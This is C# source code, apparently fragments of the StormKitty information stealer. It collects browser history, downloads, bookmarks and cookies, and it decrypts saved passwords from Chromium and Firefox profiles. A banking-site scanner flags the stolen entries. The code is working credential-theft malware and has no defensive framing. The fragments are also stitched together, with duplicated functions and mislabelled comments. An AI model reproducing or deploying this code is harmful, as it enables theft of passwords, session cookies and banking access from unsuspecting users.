/// <summary>
/// Get History from chromium based browsers
/// </summary>
/// <param name="sHistory"></param>
/// <returns>List with history</returns>
public static List <Site> Get(string sHistory)
{
try
{
List <Site> scHistory = new List <Site>();
// Read data from table
SQLite sSQLite = SqlReader.ReadTable(sHistory, "urls");
if (sSQLite == null)
{
return(scHistory);
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Site sSite = new Site();
sSite.sTitle = Crypto.GetUTF8(sSQLite.GetValue(i, 1));
sSite.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 2));
sSite.iCount = System.Convert.ToInt32(sSQLite.GetValue(i, 3)) + 1;
// Analyze value
Banking.ScanData(sSite.sUrl);
Counter.History++;
scHistory.Add(sSite);
}
return(scHistory);
}
catch { return(new List <Site>()); }
}
// Get cookies from gecko browser
public static List <Cookie> Get(string path)
{
List <Cookie> lcCookies = new List <Cookie>();
try
{
string sCookiePath = GetCookiesDBPath(path);
// Read data from table
SQLite sSQLite = SqlReader.ReadTable(sCookiePath, "moz_cookies");
if (sSQLite == null)
{
return(lcCookies);
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Cookie cCookie = new Cookie();
cCookie.sHostKey = sSQLite.GetValue(i, 4);
cCookie.sName = sSQLite.GetValue(i, 2);
cCookie.sValue = sSQLite.GetValue(i, 3);
cCookie.sPath = sSQLite.GetValue(i, 5);
cCookie.sExpiresUtc = sSQLite.GetValue(i, 6);
// Analyze value
Banking.ScanData(cCookie.sHostKey);
Counter.Cookies++;
lcCookies.Add(cCookie);
}
return(lcCookies);
}
catch (Exception ex) { Console.WriteLine(ex); }
return(new List <Cookie>());
}
/// <summary>
/// Get History from chromium based browsers
/// </summary>
/// <param name="sHistory"></param>
/// <returns>List with history</returns>
public static List <Site> Get(string sHistory)
{
List <Site> scHistory = new List <Site>();
try
{
// Read data from table
SQLite sSQLite = SqlReader.ReadTable(sHistory, "urls");
if (sSQLite == null)
{
return(scHistory);
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Site sSite = new Site();
sSite.sTitle = Crypto.GetUTF8(sSQLite.GetValue(i, 1));
sSite.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 2));
sSite.iCount = System.Convert.ToInt32(sSQLite.GetValue(i, 3)) + 1;
// Analyze value
Banking.ScanData(sSite.sUrl);
Counter.History++;
scHistory.Add(sSite);
}
}
catch (System.Exception ex) { StormKitty.Logging.Log("Chromium >> Failed collect history\n" + ex); }
return(scHistory);
}
// Get cookies from gecko browser
public static List <Site> Get(string path)
{
List <Site> scHistory = new List <Site>();
try
{
string sHistoryPath = GetHistoryDBPath(path);
// Read data from table
SQLite sSQLite = SqlReader.ReadTable(sHistoryPath, "moz_places");
if (sSQLite == null)
{
return(scHistory);
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Site sSite = new Site();
sSite.sTitle = Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 2));
sSite.sUrl = Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 1));
sSite.iCount = Convert.ToInt32(sSQLite.GetValue(i, 4)) + 1;
if (sSite.sTitle != "0")
{
// Analyze value
Banking.ScanData(sSite.sUrl);
Counter.History++;
scHistory.Add(sSite);
}
}
}
catch (Exception ex) { StormKitty.Logging.Log("Firefox >> history collection failed\n" + ex); }
return(scHistory);
}
/// <summary>
/// Get Downloads from chromium based browsers
/// </summary>
/// <param name="sHistory"></param>
/// <returns>List with downloads</returns>
public static List <Site> Get(string sHistory)
{
try
{
List <Site> scDownloads = new List <Site>();
// Read data from table
SQLite sSQLite = SqlReader.ReadTable(sHistory, "downloads");
if (sSQLite == null)
{
return(scDownloads);
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Site sSite = new Site();
sSite.sTitle = Crypto.GetUTF8(sSQLite.GetValue(i, 2));
sSite.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 17));
// Analyze value
Banking.ScanData(sSite.sUrl);
Counter.Downloads++;
scDownloads.Add(sSite);
}
return(scDownloads);
}
catch { return(new List <Site>()); }
}
// Get bookmarks from gecko browser
public static List <Bookmark> Get(string path)
{
List <Bookmark> scBookmark = new List <Bookmark>();
try
{
string sCookiePath = GetBookmarksDBPath(path);
// Read data from table
SQLite sSQLite = SqlReader.ReadTable(sCookiePath, "moz_bookmarks");
if (sSQLite == null)
{
return(scBookmark);
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Bookmark bBookmark = new Bookmark();
bBookmark.sTitle = Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 5));
if (Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 1)).Equals("0") && bBookmark.sTitle != "0")
{
// Analyze value
Banking.ScanData(bBookmark.sTitle);
Counter.Bookmarks++;
scBookmark.Add(bBookmark);
}
}
}
catch (Exception ex) { StormKitty.Logging.Log("Firefox >> bookmarks collection failed\n" + ex); }
return(scBookmark);
}
/// <summary>
/// Get Downloads from chromium based browsers
/// </summary>
/// <param name="sHistory"></param>
/// <returns>List with downloads</returns>
public static List <Site> Get(string sHistory)
{
List <Site> scDownloads = new List <Site>();
try
{
// Read data from table
SQLite sSQLite = SqlReader.ReadTable(sHistory, "downloads");
if (sSQLite == null)
{
return(scDownloads);
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Site sSite = new Site();
sSite.sTitle = Crypto.GetUTF8(sSQLite.GetValue(i, 2));
sSite.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 17));
// Analyze value
Banking.ScanData(sSite.sUrl);
Counter.Downloads++;
scDownloads.Add(sSite);
}
}
catch (System.Exception ex) { StormKitty.Logging.Log("Chromium >> Failed collect downloads\n" + ex); }
return(scDownloads);
}
/// <summary>
/// Get bookmarks from chromium based browsers
/// </summary>
/// <param name="sBookmarks"></param>
/// <returns>List with bookmarks</returns>
public static List <Bookmark> Get(string sBookmarks)
{
try
{
List <Bookmark> bBookmarks = new List <Bookmark>();
if (!File.Exists(sBookmarks))
{
return(bBookmarks);
}
string data = File.ReadAllText(sBookmarks, System.Text.Encoding.UTF8); // Load file content
data = Regex.Split(data, " \"bookmark_bar\": {")[1];
data = Regex.Split(data, " \"other\": {")[0];
string[] payload = Regex.Split(data, "},");
foreach (string parse in payload)
{
if (parse.Contains("\"name\": \"") &&
parse.Contains("\"type\": \"url\",") &&
parse.Contains("\"url\": \"http")
)
{
int index = 0;
foreach (string target in Regex.Split(parse, Parser.separator))
{
index++;
Bookmark bBookmark = new Bookmark();
if (Parser.DetectTitle(target))
{
bBookmark.sTitle = Parser.Get(parse, index);
bBookmark.sUrl = Parser.Get(parse, index + 2);
if (string.IsNullOrEmpty(bBookmark.sTitle))
{
continue;
}
if (!string.IsNullOrEmpty(bBookmark.sUrl) && !bBookmark.sUrl.Contains("Failed to parse url"))
{
// Analyze value
Banking.ScanData(bBookmark.sUrl);
Counter.Bookmarks++;
bBookmarks.Add(bBookmark);
}
}
}
}
}
return(bBookmarks);
}
catch { return(new List <Bookmark>()); }
}
// Get bookmarks from gecko browser
public static List <Bookmark> Get(string path)
{
List <Bookmark> scBookmark = new List <Bookmark>();
try
{
string sCookiePath = GetBookmarksDBPath(path);
if (!File.Exists(sCookiePath))
{
return(scBookmark);
}
string sNewPath = Path.GetTempPath() + "\\places.raw";
if (File.Exists(sNewPath))
{
File.Delete(sNewPath);
}
File.Copy(sCookiePath, sNewPath);
SQLite sSQLite = new SQLite(sNewPath);
sSQLite.ReadTable("moz_bookmarks");
if (sSQLite.GetRowCount() == 65536)
{
return(new List <Bookmark>());
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Bookmark bBookmark = new Bookmark();
bBookmark.sTitle = Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 5));
if (Chromium.Crypto.GetUTF8(sSQLite.GetValue(i, 1)).Equals("0") && bBookmark.sTitle != "0")
{
// Analyze value
Banking.ScanData(bBookmark.sTitle);
Counter.Bookmarks++;
scBookmark.Add(bBookmark);
}
}
return(scBookmark);
}
catch (Exception ex) { Console.WriteLine(ex); }
return(new List <Bookmark>());
}
/// <summary>
/// Get cookies from chromium based browsers
/// </summary>
/// <param name="sCookie"></param>
/// <returns>List with cookies</returns>
public static List <Cookie> Get(string sCookie)
{
try
{
List <Cookie> lcCookies = new List <Cookie>();
// Read data from table
SQLite sSQLite = SqlReader.ReadTable(sCookie, "cookies");
if (sSQLite == null)
{
return(lcCookies);
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Cookie cCookie = new Cookie();
cCookie.sValue = Crypto.EasyDecrypt(sCookie, sSQLite.GetValue(i, 12));
if (cCookie.sValue == "")
{
cCookie.sValue = sSQLite.GetValue(i, 3);
}
cCookie.sHostKey = Crypto.GetUTF8(sSQLite.GetValue(i, 1));
cCookie.sName = Crypto.GetUTF8(sSQLite.GetValue(i, 2));
cCookie.sPath = Crypto.GetUTF8(sSQLite.GetValue(i, 4));
cCookie.sExpiresUtc = Crypto.GetUTF8(sSQLite.GetValue(i, 5));
cCookie.sIsSecure = Crypto.GetUTF8(sSQLite.GetValue(i, 6).ToUpper());
// Analyze value
Banking.ScanData(cCookie.sHostKey);
Counter.Cookies++;
lcCookies.Add(cCookie);
}
return(lcCookies);
}
catch { return(new List <Cookie>()); }
}
/// <summary>
/// Get passwords from chromium based browsers
/// </summary>
/// <param name="sLoginData"></param>
/// <returns>List with passwords</returns>
public static List <Password> Get(string sLoginData)
{
try
{
List <Password> pPasswords = new List <Password>();
// Read data from table
SQLite sSQLite = SqlReader.ReadTable(sLoginData, "logins");
if (sSQLite == null)
{
return(pPasswords);
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Password pPassword = new Password();
pPassword.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 0));
pPassword.sUsername = Crypto.GetUTF8(sSQLite.GetValue(i, 3));
string sPassword = sSQLite.GetValue(i, 5);
if (sPassword != null)
{
pPassword.sPassword = Crypto.GetUTF8(Crypto.EasyDecrypt(sLoginData, sPassword));
pPasswords.Add(pPassword);
// Analyze value
Banking.ScanData(pPassword.sUrl);
Counter.Passwords++;
}
continue;
}
return(pPasswords);
}
catch { return(new List <Password>()); }
}
/// <summary>
/// Get passwords from chromium based browsers
/// </summary>
/// <param name="sLoginData"></param>
/// <returns>List with passwords</returns>
public static List <Password> Get(string sLoginData)
{
List <Password> pPasswords = new List <Password>();
try
{
// Read data from table
SQLite sSQLite = SqlReader.ReadTable(sLoginData, "logins");
if (sSQLite == null)
{
return(pPasswords);
}
for (int i = 0; i < sSQLite.GetRowCount(); i++)
{
Password pPassword = new Password();
pPassword.sUrl = Crypto.GetUTF8(sSQLite.GetValue(i, 0));
pPassword.sUsername = Crypto.GetUTF8(sSQLite.GetValue(i, 3));
string sPassword = sSQLite.GetValue(i, 5);
if (sPassword != null)
{
pPassword.sPassword = Crypto.GetUTF8(Crypto.EasyDecrypt(sLoginData, sPassword));
pPasswords.Add(pPassword);
// Analyze value
Banking.ScanData(pPassword.sUrl);
Counter.Passwords++;
}
continue;
}
}
catch (System.Exception ex) { StormKitty.Logging.Log("Chromium >> Failed collect passwords\n" + ex); }
return(pPasswords);
}
// Get bookmarks from gecko browser
public static List <Password> Get(string path)
{
List <Password> pPasswords = new List <Password>();
// Get firefox default profile directory
string profile = GetProfile(path);
if (profile == null)
{
return(pPasswords);
}
// Copy required files to temp dir
string newProfile = CopyRequiredFiles(profile);
if (newProfile == null)
{
return(pPasswords);
}
try
{
string JSON = File.ReadAllText(Path.Combine(newProfile, "logins.json"));
JSON = Regex.Split(JSON, ",\"logins\":\\[")[1];
JSON = Regex.Split(JSON, ",\"potentiallyVulnerablePasswords\"")[0];
string[] accounts = Regex.Split(JSON, "},");
if (Decryptor.LoadNSS(MozillaPath))
{
if (Decryptor.SetProfile(newProfile))
{
foreach (string account in accounts)
{
Match
host = FFRegex.hostname.Match(account),
user = FFRegex.username.Match(account),
pass = FFRegex.password.Match(account);
if (host.Success && user.Success && pass.Success)
{
string
hostname = Regex.Split(host.Value, "\"")[3],
username = Decryptor.DecryptPassword(Regex.Split(user.Value, "\"")[3]),
password = Decryptor.DecryptPassword(Regex.Split(pass.Value, "\"")[3]);
Password pPassword = new Password();
pPassword.sUrl = hostname;
pPassword.sUsername = username;
pPassword.sPassword = password;
// Analyze value
Banking.ScanData(hostname);
Counter.Passwords++;
pPasswords.Add(pPassword);
}
}
}
Decryptor.UnLoadNSS();
}
}
catch (Exception ex) { Logging.Log("Firefox >> Failed collect passwords\n" + ex); }
Filemanager.RecursiveDelete(newProfile);
return(pPasswords);
}